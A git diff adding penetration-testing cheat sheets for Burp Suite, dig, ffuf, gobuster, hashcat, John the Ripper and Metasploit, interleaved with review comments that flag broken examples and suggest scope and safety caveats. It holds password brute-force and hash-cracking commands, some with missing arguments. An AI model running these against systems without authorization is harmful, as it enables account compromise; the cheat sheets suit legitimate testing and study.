diff --git a/burpsuite b/burpsuite
new file mode 100644
index 0000000..c2af7fb
--- /dev/null
+++ b/burpsuite
@@ -0,0 +1,43 @@
+# Proxy Configuration
+# Configure browser to use proxy: 127.0.0.1:8080
+# Install Burp's CA Certificate in browser
+
+# Scoping
+# Target > Scope > Add to scope
+# Filter proxy traffic: Proxy > Options > Intercept Client Requests > And URL Is in target scope
+
+# Scanning
+# Target > Site map > Select host > Right click > Active Scan
+# Scanner > Options > Configure scan settings
+
+# Intruder Attack Types
+# Sniper: Single position, one wordlist
+# Battering ram: Multiple same positions, one wordlist
+# Pitchfork: Multiple positions, multiple wordlists
+# Cluster bomb: Multiple positions, multiple wordlists (all combinations)
+
+# Common Payloads
+# Intruder > Payloads
+# Simple list: wordlist
+# Runtime file: generated payloads
+# Custom iterator: complex patterns
+# Extension-generated: programmatic payloads
+
+# Session Handling
+# Project options > Sessions
+# Rules for managing cookies, tokens
+# Macros for automated actions
+
+# Extensions
+# Extender > BApp Store
+# Popular extensions:
+# - JWT Editor
+# - AuthMatrix
+# - Turbo Intruder
+# - Logger++
+
+# Advanced Features
+# Comparer: Compare requests/responses
+# Decoder: Encode/decode data
+# Sequencer: Analyze token randomness
+# Collaborator: Test OAST vulnerabilities
\ No newline at end of file
diff --git a/dig b/dig
index fbddcef..506a164 100644
--- a/dig
+++ b/dig
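Review bot: The line `# Install Burp's CA Certificate in browser` lacks the caveat a reader needs: once that CA is trusted, every TLS session of that browser can be decrypted by whoever holds the proxy's key, so it belongs in a dedicated testing profile and should be removed when the engagement ends. Suggest adding `# Use a dedicated browser profile for testing and remove the CA afterwards` directly below it. The `# Scanning` block would likewise benefit from `# Active Scan sends modifying requests; keep it inside the agreed scope`, since the scope filter set up earlier only limits what Proxy intercepts, not what the scanner targets.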
@@ -1 +1,48 @@
-#To run dig (domain information groper) dig [domain] #To just get the ip address dig [domain] +nocomments +noauthority +noadditional +nostats OR dig [domain] +noall +answer OR dig [domain] +short #To use a specific query type dig -t [query type] [domain] [options] OR dig [domain] [query type] [options] #To view ALL DNS record types use query ANY dig -t ANY [domain] [options] OR dig [domain] ANY [options] #To do a DNS reverse look up dig -x [ip address] +short #To use a specific DNS server dig @[specific DNS] [domain] #To do a bulk DNS query (where file.txt has all the domains, one to a line) dig [domain1] [options] [domain2] [options] OR dit -f file.txt [options]
\ No newline at end of file
+# To run dig (domain information groper)
+dig [domain]
+
+# To just get the ip address
+dig [domain] +nocomments +noauthority +noadditional +nostats
+# OR
+dig [domain] +noall +answer
+# OR
+dig [domain] +short
+
+# To use a specific query type
+dig -t [query type] [domain] [options]
+# OR
+dig [domain] [query type] [options]
+
+# To view ALL DNS record types use query ANY
+dig -t ANY [domain] [options]
+# OR
+dig [domain] ANY [options]
+
+# To do a DNS reverse look up
+dig -x [ip address] +short
+
+# To use a specific DNS server
+dig @[specific DNS] [domain]
+
+# To do a bulk DNS query (where file.txt has all the domains, one to a line)
+dig [domain1] [options] [domain2] [options]
+# OR
+dig -f file.txt [options]
+
+# To trace the DNS lookup path
+dig +trace [domain]
+
+# To query specific record types
+dig [domain] A # IPv4 addresses
+dig [domain] AAAA # IPv6 addresses
+dig [domain] MX # Mail servers
+dig [domain] NS # Name servers
+dig [domain] TXT # TXT records
+dig [domain] SOA # Start of Authority
+dig [domain] CNAME # Canonical name
+
+# To set timeout and number of retries
+dig +time=5 +tries=2 [domain]
+
+# To use TCP instead of UDP
+dig +tcp [domain]
\ No newline at end of file
diff --git a/ffuf b/ffuf
new file mode 100644
index 0000000..619c4c6
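Review bot: The `# To view ALL DNS record types use query ANY` section overstates what the two `dig ... ANY` lines return: many authoritative servers and resolvers answer ANY with a minimal or synthetic response (RFC 8482), so the output cannot be taken as a complete record listing. Suggest `# Note: many servers answer ANY minimally (RFC 8482); query each type explicitly to be sure` above `dig -t ANY [domain] [options]`, which also points readers at the per-type block the commit adds further down. The `dig +trace [domain]` line could carry `# Walks from the root servers directly, bypassing the configured resolver`, since that is the difference that matters when the local resolver serves split-horizon data.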
--- /dev/null
+++ b/ffuf
@@ -0,0 +1,34 @@
+# Basic directory fuzzing
+ffuf -w wordlist.txt -u http://target/FUZZ
+
+# Multiple parameters fuzzing
+ffuf -w params.txt:PARAM -w values.txt:VAL -u http://target/script.php?PARAM=VAL
+
+# Headers fuzzing
+ffuf -w wordlist.txt -u http://target -H "FUZZ: value"
+
+# POST data fuzzing
+ffuf -w wordlist.txt -X POST -d "username=admin\&password=FUZZ" -u http://target
+
+# Filter responses
+# Match size
+ffuf -w wordlist.txt -u http://target/FUZZ -fs 4242
+# Match words
+ffuf -w wordlist.txt -u http://target/FUZZ -fw 42
+# Match lines
+ffuf -w wordlist.txt -u http://target/FUZZ -fl 42
+# Match time
+ffuf -w wordlist.txt -u http://target/FUZZ -ft 2.42
+
+# Custom matching
+# Match status codes
+ffuf -w wordlist.txt -u http://target/FUZZ -mc 200,204,301,302,307,401
+# Match regular expressions
+ffuf -w wordlist.txt -u http://target/FUZZ -mr "admin"
+
+# Rate limiting
+ffuf -w wordlist.txt -u http://target/FUZZ -p 0.1
+
+# Output formats
+ffuf -w wordlist.txt -u http://target/FUZZ -o results.json
+# Supported formats: json, ejson, html, md, csv, ecsv
\ No newline at end of file
diff --git a/gobuster b/gobuster
new file mode 100644
index 0000000..9613247
--- /dev/null
+++ b/gobuster
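Review bot: The POST example `ffuf -w wordlist.txt -X POST -d "username=admin\&password=FUZZ" -u http://target` sends a literal backslash: inside double quotes the shell does not treat `\&` as an escape, so the body on the wire is `username=admin\&password=FUZZ` and the `password` field never parses; the line should be `ffuf -w wordlist.txt -X POST -d "username=admin&password=FUZZ" -u http://target`. The `# Filter responses` block also mislabels its flags: `-fs`, `-fw`, `-fl` and `-ft` exclude responses that match, while only the `-mc`/`-mr` lines under `# Custom matching` are matchers, so the four comments should read `# Filter out responses of this size` (and words, lines, time) rather than `# Match size`. The `# Rate limiting` comment would be clearer as `# Delay between requests in seconds (-p)`, since `-p 0.1` is a per-request pause rather than a requests-per-second cap.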
@@ -0,0 +1,50 @@
+# Directory Enumeration
+# Basic directory scan
+gobuster dir -u http://target -w wordlist.txt
+
+# Advanced Options
+# With file extensions
+gobuster dir -u http://target -w wordlist.txt -x php,txt,html
+
+# With custom status codes
+gobuster dir -u http://target -w wordlist.txt -s 200,204,301,302,307,401,403
+
+# With custom threads
+gobuster dir -u http://target -w wordlist.txt -t 50
+
+# With custom timeout
+gobuster dir -u http://target -w wordlist.txt --timeout 30s
+
+# DNS Enumeration
+# Basic DNS scan
+gobuster dns -d example.com -w wordlist.txt
+
+# With specific resolver
+gobuster dns -d example.com -w wordlist.txt -r 8.8.8.8
+
+# VHOST Enumeration
+# Basic vhost scan
+gobuster vhost -u http://target -w wordlist.txt
+
+# With custom headers
+gobuster vhost -u http://target -w wordlist.txt -H 'User-Agent: CustomAgent'
+
+# Advanced Features
+# Pattern matching
+gobuster dir -u http://target -w wordlist.txt -p pattern
+
+# Custom cookies
+gobuster dir -u http://target -w wordlist.txt -c 'session=123456'
+
+# Basic auth
+gobuster dir -u http://target -w wordlist.txt -U username -P password
+
+# Output formats
+gobuster dir -u http://target -w wordlist.txt -o output.txt
+gobuster dir -u http://target -w wordlist.txt -o output.json -f json
+
+# Wildcard detection
+gobuster dir -u http://target -w wordlist.txt --wildcard
+
+# Custom User-Agent
+gobuster dir -u http://target -w wordlist.txt -a 'CustomUserAgent/1.0'
\ No newline at end of file
diff --git a/hashcat b/hashcat
new file mode 100644
index 0000000..26bb3d2
--- /dev/null
+++ b/hashcat
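Review bot: The status-code example `gobuster dir -u http://target -w wordlist.txt -s 200,204,301,302,307,401,403` fails on gobuster 3.1 and later, because `-s` conflicts with the status-code blacklist that is set by default (`-b 404`) and the tool refuses to run with both; the line needs `-b ""` appended, `gobuster dir -u http://target -w wordlist.txt -s 200,204,301,302,307,401,403 -b ""`. The second `# Output formats` line is doubtful as well: as far as I know `-f` in dir mode is `--add-slash`, not an output-format selector, so `-o output.json -f json` does not write JSON; check `gobuster dir --help` for the installed version and either drop that line or document the flag actually intended. The `# Pattern matching` comment above `-p pattern` reads as if `-p` takes a regex, but where `-p` maps to `--pattern` it takes a file of replacement patterns (and in older releases `-p` was the proxy flag), so a comment like `# -p/--pattern takes a pattern file, not a regex; verify for your version` would prevent misuse.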
@@ -0,0 +1,45 @@
+# Basic Usage
+hashcat -m -a
+
+# Common Hash Types (-m)
+# 0: MD5
+# 100: SHA1
+# 1000: NTLM
+# 1800: sha512crypt $6$
+# 3200: bcrypt
+# 5600: NetNTLMv2
+
+# Attack Modes (-a)
+# 0: Straight (wordlist)
+# 1: Combination
+# 3: Brute-force
+# 6: Hybrid Wordlist + Mask
+# 7: Hybrid Mask + Wordlist
+
+# Mask Attack Examples
+# ?l = abcdefghijklmnopqrstuvwxyz
+# ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
+# ?d = 0123456789
+# ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+# ?a = ?l?u?d?s
+hashcat -a 3 -m 0 hash.txt ?l?l?l?l?l?l?l?l
+
+# Rule-based Attack
+hashcat -a 0 -m 0 hash.txt wordlist.txt -r rules/best64.rule
+
+# Show Cracked Passwords
+hashcat -m 0 hash.txt --show
+
+# Benchmark
+hashcat -b
+
+# Session Management
+# Start new session
+hashcat --session name
+# Restore session
+hashcat --session name --restore
+
+# Performance Tuning
+# Workload profile (-w)
+# 1: Low, 2: Default, 3: High, 4: Nightmare
+hashcat -w 3
\ No newline at end of file
diff --git a/john b/john
index 091986d..7e3b9ed 100644
--- a/john
+++ b/john
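Review bot: The `# Basic Usage` line `hashcat -m -a` has lost its arguments — both `-m` and `-a` require a value — so as written it is not a runnable example; restore placeholders in the bracket style the dig and john sheets use, `hashcat -m [hash type] -a [attack mode] [hash file] [wordlist]`. The same dropped-placeholder problem appears in the john hunk (`john --format= [passwordfile]`) and in the metasploit hunk (`use`, `set payload`, `set`), which looks like angle-bracket placeholders being stripped when the files were edited. The `# Start new session` line `hashcat --session name` is incomplete in the same way, since a session only exists once an attack is given; `hashcat --session [name] -m [hash type] -a [attack mode] [hash file] [wordlist]` would make the `--restore` example below it meaningful.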
@@ -1 +1,44 @@
-#To show the types of passwords that John can crack with crack speed (in cracks/second) john --test #To use your own word list (the Rockyou list is suggested) john --wordlist=[filename] [passwordfile] #To show your results after running john (shows ~/.john/john.pot) john --show #To restore an interrupted john session john --restore
\ No newline at end of file
+# To show the types of passwords that John can crack with crack speed (in cracks/second)
+john --test
+
+# To use your own word list (the Rockyou list is suggested)
+john --wordlist=[filename] [passwordfile]
+
+# To show your results after running john (shows ~/.john/john.pot)
+john --show
+
+# To restore an interrupted john session
+john --restore
+
+# To use a specific format for cracking
+john --format= [passwordfile]
+
+# Common formats:
+# raw-md5, raw-sha1, raw-sha256, raw-sha512
+# mysql, mysql-sha1
+# nt, lm
+# crypt
+
+# To use rules while cracking
+john --rules --wordlist=[filename] [passwordfile]
+
+# To use mask attack
+john --mask='?l?l?l?l?l?d?d' [passwordfile]
+
+# To use incremental mode
+john --incremental [passwordfile]
+
+# To use multiple cores
+john --fork=4 [passwordfile]
+
+# To list all available formats
+john --list=formats
+
+# To show cracking status
+john --status
+
+# To create custom rules
+# Add to john.conf:
+# [List.Rules:Custom]
+# $[0-9]$[0-9]
+john --wordlist=[filename] --rules:Custom [passwordfile]
\ No newline at end of file
diff --git a/metasploit b/metasploit
index ee58e17..c759683 100644
--- a/metasploit
+++ b/metasploit
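Review bot: The `# Common formats:` list and the `john --mask='?l?l?l?l?l?d?d' [passwordfile]` example assume the jumbo build without saying so: as far as I know the `raw-*`, `nt` and `mysql*` format names and the `--mask` option are not present in core John the Ripper, so a reader on a stock package gets "unknown option" or "unknown ciphertext format" errors. Suggest `# --mask and the raw-*/nt/mysql formats require the jumbo build` above `# Common formats:`, and `# Use --list=formats to see what your build supports` next to it, pointing at the `john --list=formats` line the commit adds. The `# To create custom rules` block would also read better with `# The rule below appends two digits to each candidate` above `# $[0-9]$[0-9]`, since the rule syntax is not self-explanatory.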
@@ -1,26 +1,82 @@ -# To show all exploits that for a vulnerability +# Basic Usage +# Start metasploit console +msfconsole + +# Show all exploits for a vulnerability grep show exploits -# To select an exploit to use +# Select an exploit to use use -# To see the current settings for a selected exploit +# Show current settings for selected exploit show options -# To see compatible payloads for a selected exploit +# Show compatible payloads for selected exploit show payloads -# To set the payload for a selected exploit +# Set the payload for selected exploit set payload -# To set setting for a selected exploit +# Set setting for selected exploit set